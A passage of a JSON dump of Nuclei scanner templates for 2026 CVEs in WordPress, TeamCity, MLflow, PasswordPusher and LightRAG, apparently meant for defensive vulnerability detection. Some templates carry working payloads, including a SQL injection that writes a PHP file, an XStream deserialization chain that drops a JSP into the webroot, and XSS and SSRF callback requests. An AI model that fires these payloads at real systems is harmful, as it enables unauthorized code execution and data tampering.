HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"name\":\"{{random}}\",\"url\":\"https://{{interactsh-url}}\",\"events\":[{\"entity\":\"REGISTERED_MODEL\",\"action\":\"CREATED\"}]}\n\n      - |\n        POST /api/2.0/mlflow/webhooks/{{webhook_id}}/test HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"webhook_id\":\"{{webhook_id}}\",\"event\":{\"entity\":\"REGISTERED_MODEL\",\"action\":\"CREATED\"}}\n\n      - |\n        DELETE /api/2.0/mlflow/webhooks/{{webhook_id}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body_1\n        words:\n          - \"webhook_id\"\n          - \"ACTIVE\"\n        condition: and\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n    extractors:\n      - type: regex\n        name: webhook_id\n        part: body\n        internal: true\n        regex:\n          - '\"webhook_id\":\\s*\"([^\"]+)\"'\n        group: 1\n# digest: 4b0a00483046022100a54ac9b4ec038969d2ceb7b47d0f34ff14e56e0551d9096a9cfa4b1b4c0616de022100f44f270657767c57415118691a024095dde27e164d9e6f82bfa52a876caca7e2:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-64849.yaml","vuln_id":"cve-2026-64849"},{"raw":"id: CVE-2026-64638\n\ninfo:\n  name: WordPress Core < 7.0.3 - Preauth Reflected XSS (XSS2Shell)\n  author: FLX | Nick Vidovic (greenhats)\n  severity: high\n  description: |\n    Pre-authentication reflected XSS in WordPress wp-login.php (CVE-2026-64638).\n    The flaw exploits a parser differential between PHP strip_tags() and\n    WordPress KSES. Tags with whitespace after < (e.g. \"< area\") survive\n    strip_tags() but are normalized to valid HTML by KSES, leading to\n    attacker-controlled DOM elements that trigger automatic JavaScript\n    execution via user-profile.js. No user interaction required.\n    Affects all WordPress versions < 7.0.3.\n  impact: |\n    Attackers can execute scripts leading to remote code execution via social engineering and victim interaction.\n  remediation: |\n    Upgrade WordPress to 7.0.3 or apply the backported security patch.\n  reference:\n    - https://pwn.ai/blog/xss2shell\n    - https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-64638\n    - https://wordpress.org/news/2026/08/wordpress-7-0-3-release/\n  classification:\n    cve-id: CVE-2026-64638\n    epss-score: 0.31204\n    epss-percentile: 0.98192\n    cvss-score: 8.9\n    cwe-id: CWE-79\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n  metadata:\n    max-request: 3\n    verified: true\n    shodan-query: http.component:\"wordpress\"\n  tags: cve,cve2026,wordpress,xss,rce,pwnai\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-login.php\"\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"loginform\"\n          - \"wp-core-ui\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-login.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        log=%3C%20area%20id%3Dajaxurl%20href%3D%2F%3Frest_route%3D%2F%26_method%3DGET%26_jsonp%3Dalert%3E%3C%20div%20id%3Dcolor-picker%20class%3Dreset-pass-submit%3E%3C%20button%20class%3D%22wp-generate-pw%20color-option%22%3EX&pwd=x&wp-submit=Log+In\n\n      - |\n        POST /wp-login.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        log=%3C%20area%20id%3Dajaxurl%20href%3D%2F%3Frest_route%3D%2F%26_method%3DGET%26_envelope%3D1%26_jsonp%3Dalert%3E%3C%20div%20id%3Dcolor-picker%20class%3Dreset-pass-submit%3E%3C%20button%20class%3D%22wp-generate-pw%20color-option%22%3EX&pwd=x&wp-submit=Log+In\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"<area[^>]*id=[\\\"']?ajaxurl\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        regex:\n          - \"<area[^>]*id=[\\\"']?ajaxurl[^>]*>\"\n# digest: 4b0a0048304602210085be8d22d1076637ef2bdaed46c6d4f234417696957bdb17cabff5c53de5379c0221008db9ed0cbfb6de78905e3f54105cab3795fd655b28e85e3c92ddf1b53d6c0ff8:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-64638.yaml","vuln_id":"cve-2026-64638"},{"raw":"id: CVE-2026-6433\n\ninfo:\n  name: FlipperCode Custom CSS, JS & PHP <= 2.0.7 - Remote Code Execution\n  author: theamanrawat\n  severity: critical\n  description: |\n    Custom css-js-php WordPress plugin through 2.0.7 contains a command injection caused by unsanitized user input used in SQL query and passed to eval(), letting unauthenticated attackers execute arbitrary PHP code on the server.\n  impact: |\n    Unauthenticated attackers can execute arbitrary PHP code on the server, leading to full server compromise.\n  remediation: |\n    Update to the latest version.\n  reference:\n    - https://wpscan.com/vulnerability/a0b1c059-e156-4402-ac8d-67f8ad7386cc/\n    - https://github.com/murrez/CVE-2026-6433\n    - https://patchstack.com/database/wordpress/plugin/custom-css-js-php/vulnerability/wordpress-custom-css-js-php-plugin-2-0-7-unauthenticated-sql-injection-to-rce-vulnerability\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-6433\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-6433\n    epss-score: 0.01195\n    epss-percentile: 0.66691\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: flippercode\n    product: custom-css-js-php\n    framework: wordpress\n    shodan-query: http.component:\"WordPress\"\n  tags: cve,cve2026,wordpress,wp-plugin,sqli,rce,custom-css-js-php,unauth,intrusive,vkev\n\nvariables:\n  filename: \"{{rand_text_alpha(8)}}\"\n  marker: \"{{rand_text_alpha(12)}}\"\n\nflow: |\n  http(1) && http(2) && http(3);\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=fc_ajax_call&operation=wce_editor_inline_code&id=0+UNION+SELECT+1,'t','php',0x3c3f7068702066696c655f7075745f636f6e74656e74732827{{hex_encode(filename)}}2e747874272c27{{hex_encode(marker)}}27293b203f3e,'header','',0,1--+\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200 || status_code == 500\"\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-admin/{{filename}}.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{marker}}\"\n\n      - type: status\n        status:\n          - 200\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=fc_ajax_call&operation=wce_editor_inline_code&id=0+UNION+SELECT+1,'t','php',0x3c3f7068702040756e6c696e6b2827{{hex_encode(filename)}}2e74787427293b203f3e,'header','',0,1--+\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"true\"\n        internal: true\n# digest: 490a00463044022004a6236ea59fec0d01d8a98b3f6512a20d9f23cf850cf5f01eb5f1cf53c8f8cf022073340fcb332409423ffe5adb0687913b2478c1c215493fdd65f3ae8f0abd289f:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-6433.yaml","vuln_id":"cve-2026-6433"},{"raw":"id: CVE-2026-63077\n\ninfo:\n  name: JetBrains TeamCity < 2026.1.3, 2025.11.7 - Remote Code Execution\n  author: 0x_Akoko,pdteam\n  severity: critical\n  description: |\n    JetBrains TeamCity < 2026.1.3, 2025.11.7 contains a remote code execution caused by unsafe XStream deserialization in the unauthenticated agent polling protocol. The XStream instance serving /app/agents/v1 is created without NoTypePermission.NONE, so XStream's default type permissions (Throwable, Map and Collection hierarchies) remain in effect next to the TeamCity allowlist. An unauthenticated attacker registers an agent, obtains a TeamCity-AgentSessionId, and posts an XStream XML object graph to /app/agents/v1/commands/error that makes TeamCity write an attacker-controlled file into the webroot. This template writes an arithmetic-canary JSP (no OS command execution) and matches its evaluated output.\n  impact: |\n    Unauthenticated remote attackers can execute arbitrary code with the privileges of the TeamCity server process.\n  remediation: |\n    Upgrade to TeamCity 2026.1.3, 2025.11.7 or later.\n  reference:\n    - https://blog.jetbrains.com/teamcity/2026/07/cve-2026-63077/\n    - https://www.rapid7.com/blog/post/ra-unauthenticated-rce-in-jetbrains-teamcity-cve-2026-63077/\n    - https://github.com/sfewer-r7/CVE-2026-63077\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-63077\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-63077\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-63077\n    cwe-id: CWE-502\n    epss-score: 0.86518\n    epss-percentile: 0.99729\n    cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: jetbrains\n    product: teamcity\n    shodan-query: title:\"TeamCity\"\n    fofa-query: title=\"TeamCity\"\n  tags: cve,cve2026,jetbrains,teamcity,rce,deserialization,kev,intrusive,vkev\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(body, \"TeamCity\", \"teamcity\", \"JetBrains\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /app/agents/v1/register HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/xml\n\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <agentDetails agentName=\"nuclei-{{randstr}}\" agentAddress=\"127.0.0.1\" agentPort=\"9090\" authToken=\"nuclei-{{randstr}}\" pingCode=\"\">\n          <alternativeAddresses/>\n          <availableRunners/>\n          <availableVcs/>\n          <buildParameters/>\n          <configParameters/>\n        </agentDetails>\n\n    extractors:\n      - type: regex\n        name: session\n        part: header\n        group: 1\n        regex:\n          - '(?i)teamcity-agentsessionid: ([^\\r\\n]+)'\n        internal: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(to_lower(header), \"teamcity-agentsessionid:\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /app/agents/v1/commands/error HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/xml\n        TeamCity-AgentSessionId: {{session}}\n        TeamCity-AgentCommandId: 123456\n\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <linked-hash-map>\n          <entry>\n            <string>n1</string>\n            <jetbrains.buildServer.serverSide.metadata.impl.metadata.HSQLMetadataStorage_-SchemaMismatchException>\n              <outer-class>\n                <myHSQLStorage>\n                  <myDataSource>\n                    <defaultTransactionIsolation>-1</defaultTransactionIsolation>\n                    <cacheState>true</cacheState>\n                    <driverClassName>org.hsqldb.jdbc.JDBCDriver</driverClassName>\n                    <lifo>true</lifo>\n                    <maxTotal>8</maxTotal>\n                    <maxIdle>8</maxIdle>\n                    <minIdle>0</minIdle>\n                    <initialSize>0</initialSize>\n                    <maxWaitMillis>-1</maxWaitMillis>\n                    <poolPreparedStatements>false</poolPreparedStatements>\n                    <clearStatementPoolOnReturn>false</clearStatementPoolOnReturn>\n                    <maxOpenPreparedStatements>-1</maxOpenPreparedStatements>\n                    <testOnCreate>false</testOnCreate>\n                    <testOnBorrow>true</testOnBorrow>\n                    <testOnReturn>false</testOnReturn>\n                    <timeBetweenEvictionRunsMillis>-1</timeBetweenEvictionRunsMillis>\n                    <numTestsPerEvictionRun>3</numTestsPerEvictionRun>\n                    <minEvictableIdleTimeMillis>1800000</minEvictableIdleTimeMillis>\n                    <softMinEvictableIdleTimeMillis>-1</softMinEvictableIdleTimeMillis>\n                    <evictionPolicyClassName>org.apache.commons.pool2.impl.DefaultEvictionPolicy</evictionPolicyClassName>\n                    <testWhileIdle>false</testWhileIdle>\n                    <password/>\n                    <url>jdbc:hsqldb:mem:nuclei{{randstr}}</url>\n                    <userName>SA</userName>\n                    <validationQueryTimeoutSeconds>-1</validationQueryTimeoutSeconds>\n                    <connectionInitSqls>\n                      <string>CREATE TABLE TN{{randstr}}(CN{{randstr}} VARCHAR(4000))</string>\n                      <string>INSERT INTO TN{{randstr}} VALUES ('&lt;p&gt;&lt;%=7*6%&gt;&lt;/p&gt;PD-TP-CONFIRMED')</string>\n                      <string>SCRIPT '../webapps/ROOT/pd-tp-{{randstr}}.jspws'</string>\n                    </connectionInitSqls>\n                    <accessToUnderlyingConnectionAllowed>false</accessToUnderlyingConnectionAllowed>\n                    <maxConnLifetimeMillis>-1</maxConnLifetimeMillis>\n                    <logExpiredConnections>true</logExpiredConnections>\n                    <autoCommitOnReturn>true</autoCommitOnReturn>\n                    <rollbackOnReturn>true</rollbackOnReturn>\n                    <fastFailValidation>false</fastFailValidation>\n                    <connectionProperties/>\n                    <closed>false</closed>\n                  </myDataSource>\n                  <myStopped>false</myStopped>\n                  <myDatabaseOpen>false</myDatabaseOpen>\n                </myHSQLStorage>\n              </outer-class>\n            </jetbrains.buildServer.serverSide.metadata.impl.metadata.HSQLMetadataStorage_-SchemaMismatchException>\n          </entry>\n          <entry>\n            <string>n2</string>\n            <freemarker.ext.beans.HashAdapter>\n              <wrapper>\n                <sharedIntrospectionLock/>\n                <classIntrospector>\n                  <exposureLevel>0</exposureLevel>\n                  <exposeFields>false</exposeFields>\n                  <treatDefaultMethodsAsBeanMembers>false</treatDefaultMethodsAsBeanMembers>\n                  <incompatibleImprovements>\n                    <major>2</major>\n                    <minor>3</minor>\n                    <micro>0</micro>\n                    <intValue>2003000</intValue>\n                    <calculatedStringValue>2.3.0</calculatedStringValue>\n                    <hashCode>0</hashCode>\n                  </incompatibleImprovements>\n                  <hasSharedInstanceRestrictions>false</hasSharedInstanceRestrictions>\n                  <shared>false</shared>\n                  <sharedLock reference=\"../../sharedIntrospectionLock\"/>\n                  <cache/>\n                  <cacheClassNames/>\n                  <classIntrospectionsInProgress/>\n                  <modelFactories/>\n                  <clearingCounter>0</clearingCounter>\n                </classIntrospector>\n                <falseModel>\n                  <object reference=\"../../../../../entry/jetbrains.buildServer.serverSide.metadata.impl.metadata.HSQLMetadataStorage_-SchemaMismatchException/outer-class/myHSQLStorage/myDataSource\"/>\n                  <wrapper reference=\"../..\"/>\n                  <value>false</value>\n                </falseModel>\n                <writeProtected>false</writeProtected>\n                <defaultDateType>0</defaultDateType>\n                <methodsShadowItems>true</methodsShadowItems>\n                <simpleMapWrapper>false</simpleMapWrapper>\n                <strict>false</strict>\n                <preferIndexedReadMethod>true</preferIndexedReadMethod>\n                <incompatibleImprovements reference=\"../classIntrospector/incompatibleImprovements\"/>\n              </wrapper>\n              <model reference=\"../wrapper/falseModel\"/>\n            </freemarker.ext.beans.HashAdapter>\n          </entry>\n          <entry>\n            <string>n3</string>\n            <set>\n              <org.apache.commons.collections.keyvalue.TiedMapEntry>\n                <map class=\"freemarker.ext.beans.HashAdapter\" reference=\"../../../../entry[2]/freemarker.ext.beans.HashAdapter\"/>\n                <key class=\"string\">connection</key>\n              </org.apache.commons.collections.keyvalue.TiedMapEntry>\n            </set>\n          </entry>\n        </linked-hash-map>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 500'\n        internal: true\n\n  - raw:\n      - |\n        GET /pd-tp-{{randstr}}.jspws HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"PD-TP-CONFIRMED\"\n\n      - type: word\n        part: body\n        words:\n          - \"<%=7*6%>\"\n        negative: true\n\n      - type: status\n        status:\n          - 200\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402205da8f230a99b3ee1dfc1122b90bac31981d318dfbdb2be30c3f63c682dfad101022048cbf70c52c26d003c02da0d2750e868859b114973ccc961ba5be824a6da8936:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-63077.yaml","vuln_id":"cve-2026-63077"},{"raw":"id: CVE-2026-63030\n\ninfo:\n  name: WordPress Core 6.9-7.0.1 - Pre-Auth Batch-Route Confusion\n  author: slcyber,mielverkerken,pdteam,flx-0x00\n  severity: critical\n  description: |\n    WordPress core versions 6.9.0 through 6.9.4 and 7.0.0 through 7.0.1 are vulnerable to a pre-authentication route confusion issue in the REST API batch endpoint (/?rest_route=/batch/v1). A malformed nested batch request desynchronizes the batch router, allowing unauthenticated requests to reach unintended REST API handlers and bypass authorization checks. This route confusion can be chained with a SQL injection flaw (CVE-2026-60137) in the author_exclude parameter to extract database contents and ultimately achieve remote code execution. This template safely detects the vulnerable handler state via the route confusion behavior alone, without executing SQL or relying on response timing.\n  impact: |\n    The route confusion allows unauthenticated requests to reach REST API handlers they should not be able to access. When chained with the associated SQL injection, an unauthenticated attacker can read the entire WordPress database (including user credential hashes) and escalate to full site compromise and remote code execution.\n  remediation: |\n    Update WordPress immediately to version 6.9.5 or 7.0.2. As a temporary mitigation, block POST requests to /wp-json/batch/v1 and /?rest_route=/batch/v1 at the WAF or reverse proxy level.\n  reference:\n    - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662q\n    - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-fpp7-x2x2-2mjf\n    - https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core\n    - https://www.aikido.dev/blog/unauthenticated-rce-in-wordpress-wp2shell\n    - https://wordpress.org/news/2026/07/wordpress-7-0-2-release/\n    - https://github.com/sergiointel/wp2shell-poc/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-63030\n    epss-score: 0.97271\n    epss-percentile: 0.99893\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: wordpress\n    product: wordpress\n    framework: wordpress\n    shodan-query: http.component:\"wordpress\"\n    fofa-query: app=\"WordPress\"\n  tags: cve,cve2026,wordpress,wp-core,preauth,batch-api,route-confusion,vkev,kev\n\nflow: http(1) && http(2)\n\nhttp:\n  # Step 1: Confirm the target is a WordPress site before probing the batch endpoint\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"wp-content\") || contains(body, \"wp-includes\") || contains(tolower(header), \"rest_route\") || contains(tolower(header), \"wp-json\")'\n        internal: true\n\n  # Step 2: Safe route-confusion detection (no SQL execution, no timing oracle)\n  - raw:\n      - |\n        POST /?rest_route=/batch/v1 HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"requests\":[{\"method\":\"POST\",\"path\":\"///\"},{\"method\":\"POST\",\"path\":\"/wp/v2/posts\"},{\"method\":\"POST\",\"path\":\"/wp/v2/block-renderer/core/archives\"},{\"method\":\"POST\",\"path\":\"/batch/v1\",\"body\":{\"requests\":[]}}]}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"parse_path_failed\"\n          - \"block_cannot_read\"\n          - \"rest_batch_not_allowed\"\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 207\n# digest: 4a0a00473045022001dd696a9764a36252b8466f2f40a0810a6008ec511a91b064312653974934b9022100bf1527871315b933699f7e1f0b8b153875c887d995c4a3ed5d9d232e782951d0:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-63030.yaml","vuln_id":"cve-2026-63030"},{"raw":"id: CVE-2026-62382\n\ninfo:\n  name: PasswordPusher v1.45.11-v2.9.5 - Unauthenticated Anonymous Push Deletion via Ownership Bypass\n  author: DhiyaneshDk\n  severity: medium\n  description: |\n    PasswordPusher v1.45.11 through v2.9.5 allows unauthenticated deletion of anonymous pushes due to a nil==nil ownership-check bypass (CWE-863). The deletion guard evaluates (@push.user == current_user) || @push.deletable_by_viewer. For anonymous pushes, @push.user is nil; for unauthenticated requests, current_user is nil. Ruby evaluates nil==nil as true, so the ownership check passes and the deletable_by_viewer=false restriction is completely bypassed. Anyone who knows the secret URL token can permanently expire an anonymous push without any credentials.\n  impact: |\n    An unauthenticated attacker who knows a push's secret URL token can permanently delete (expire) any anonymous push, even when the push creator explicitly set deletable_by_viewer to false.\n  remediation: |\n    Upgrade PasswordPusher to v2.9.6 or later.\n  reference:\n    - https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-jf2m-hpj9-4qx2\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-62382\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L\n    cvss-score: 6.9\n    cve-id: CVE-2026-62382\n    epss-score: 0.00689\n    epss-percentile: 0.51354\n    cwe-id: CWE-863\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: pglombardo\n    product: passwordpusher\n    shodan-query: title:\"Password Pusher\"\n    fofa-query: body=\"Password Pusher\"\n  tags: cve,cve2026,passwordpusher,authz-bypass,intrusive,file-upload\n\nflow: |\n  http(\"create-push\");\n  if (template[\"url_token\"] != \"\") {\n    http(\"delete-push\");\n  }\n\nhttp:\n  - id: create-push\n    raw:\n      - |\n        POST /p.json HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json\n\n        {\"password\":{\"payload\":\"nuclei-{{randstr}}\",\"deletable_by_viewer\":false,\"expire_after_views\":10}}\n\n    matchers:\n      - type: dsl\n        internal: true\n        dsl:\n          - 'contains(body, \"url_token\")'\n          - 'status_code == 201'\n        condition: and\n\n    extractors:\n      - type: json\n        name: url_token\n        json:\n          - '.url_token'\n        internal: true\n\n  - id: delete-push\n    raw:\n      - |\n        DELETE /p/{{url_token}}.json HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"\\\"expired\\\":true\", \"\\\"deleted\\\":true\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a00473045022100e1e56cecaa45949891407c460b41bf303b6010c99ed88a641d4f31c2831cc4c702206cb644b909bc6a45438cbfdff74095e3bea95434d65421c2d93b973d07cd0a30:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-62382.yaml","vuln_id":"cve-2026-62382"},{"raw":"id: CVE-2026-6203\n\ninfo:\n  name: User Registration & Membership WordPress plugin - Open Redirect\n  author: theamanrawat\n  severity: medium\n  description: |\n    User Registration & Membership WordPress plugin <= 5.1.4 contains an open redirect caused by insufficient validation of 'redirect_to_on_logout' parameter, letting attackers redirect users to malicious external URLs after logout, exploit requires crafted URL.\n  impact: |\n    Attackers can redirect users to malicious sites after logout, facilitating phishing attacks and user deception.\n  remediation: |\n    Update to a version later than 5.1.4 or the latest available version.\n  reference:\n    - https://patchstack.com/database/vulnerability/wordpress-user-registration-membership-plugin-5-1-4-unauthenticated-open-redirect-via-redirect-to-on-logout-parameter-vulnerability\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-6203\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-6203\n    epss-score: 0.00663\n    epss-percentile: 0.50262\n    cwe-id: CWE-601\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: http.html:\"/wp-content/plugins/user-registration/\"\n    fofa-query: body=\"/wp-content/plugins/user-registration/\" && title=\"WordPress\"\n  tags: cve,cve2026,wp,wordpress,wp-plugin,user-registration,open-redirect\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/user-registration/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"User Registration\")'\n        condition: and\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?user-logout=true&redirect_to_on_logout=https://interact.sh\"\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 302\n\n      - type: word\n        part: header\n        words:\n          - \"Location: https://interact.sh\"\n# digest: 490a0046304402200593828ef6294472eff2af75a32a58f8249471046fcb89d73a5b2312bc21873e02201a20b42729d1e025535382eb92ab1b1f77fc1b72a96ec1f663cdff930e798b48:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-6203.yaml","vuln_id":"cve-2026-6203"},{"raw":"id: CVE-2026-61808\n\ninfo:\n  name: LightRAG <= 1.5.4 - Missing Authentication\n  author: str4k3r\n  severity: high\n  description: |\n    LightRAG through version 1.5.4 contains a broken access control vulnerability caused by the API server binding to all network interfaces with authentication disabled, letting unauthenticated network attackers fully control indexed documents and resources, exploit requires network access.\n  impact: |\n    Unauthenticated attackers can read, modify, delete documents, and consume resources, leading to full system compromise and denial of service.\n  remediation: |\n    Update to version 1.5.5rc1 or later.\n  reference:\n    - https://github.com/HKUDS/LightRAG/security/advisories/GHSA-mmg5-8x8q-v934\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-61808\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: hkuds\n    product: lightrag\n    shodan-query: http.html:\"LightRAG\"\n    fofa-query: body=\"LightRAG\"\n  tags: cve,cve2026,lightrag,lfi,traversal,ai\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /health HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(tolower(body), \"healthy\", \"lightrag\", \"status\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /documents HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"statuses\", \"content_summary\", \"file_path\")'\n        condition: and\n# digest: 490a0046304402200af8e3fbcb6782ee7071df72d00a4e74b8df50cd58a10c682cf889f82341b01102203ccb4c95e97f30e01e4c118f3ad8a2cb503557ad0982714dc8541551bca8eb05:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-61808.yaml","vuln_id":"cve-2026-61808"},{"raw":"id: CVE-2026-61736\n\ninfo:\n  name: LightRAG <= 1.5.3 - Credentialed CORS Wildcard\n  author: str4k3r\n  severity: high\n  description: |\n    LightRAG <= 1.5.4 contains a broken access control vulnerability caused by default CORS_ORIGINS=* with allow_credentials=True in lightrag_server.py, letting malicious websites perform authenticated API requests, exploit requires authenticated user.\n  impact: |\n    Malicious websites can perform authenticated API requests to exfiltrate or delete data, leading to data loss and information disclosure.\n  remediation: |\n    Update to version 1.5.4 or later.\n  reference:\n    - https://github.com/HKUDS/LightRAG/security/advisories/GHSA-6x6h-qqr7-855w\n    - https://github.com/HKUDS/LightRAG/commit/09567a4c983f580050db63569dd477122c058c3d\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-61736\n  classification:\n    cve-id: CVE-2026-61736\n    epss-score: 0.01422\n    epss-percentile: 0.7171\n    cwe-id: CWE-942\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N\n    cvss-score: 9.3\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: hkuds\n    product: lightrag\n    shodan-query: http.html:\"LightRAG\"\n    fofa-query: body=\"LightRAG\"\n  tags: cve,cve2026,lightrag,cors,misconfig\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_any(tolower(body), \"lightrag\", \"light-rag\", \"knowledge graph\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        OPTIONS /query HTTP/1.1\n        Host: {{Hostname}}\n        Origin: {{cors_origin}}\n        Access-Control-Request-Method: POST\n        Access-Control-Request-Headers: authorization,content-type\n\n    payloads:\n      cors_origin:\n        - \"https://{{tolower(rand_base(5))}}.com\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(tolower(header), \"access-control-allow-origin: {{cors_origin}}\")'\n          - 'contains(tolower(header), \"access-control-allow-credentials: true\")'\n        condition: and\n# digest: 4a0a00473045022100f6c9d58b896631164aaceb9974a9bee1a44d524894921733099d16168ee8e4590220626ecbc0d4e76a7983ddee3e4737013b39adde0198d065dbc9fe0e3eca2eb6b5:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-61736.yaml","vuln_id":"cve-2026-61736"},{"raw":"id: CVE-2026-61511\n\ninfo:\n  name: vBulletin 6.x - Remote Code Execution\n  author: alex700,0x_Akoko\n  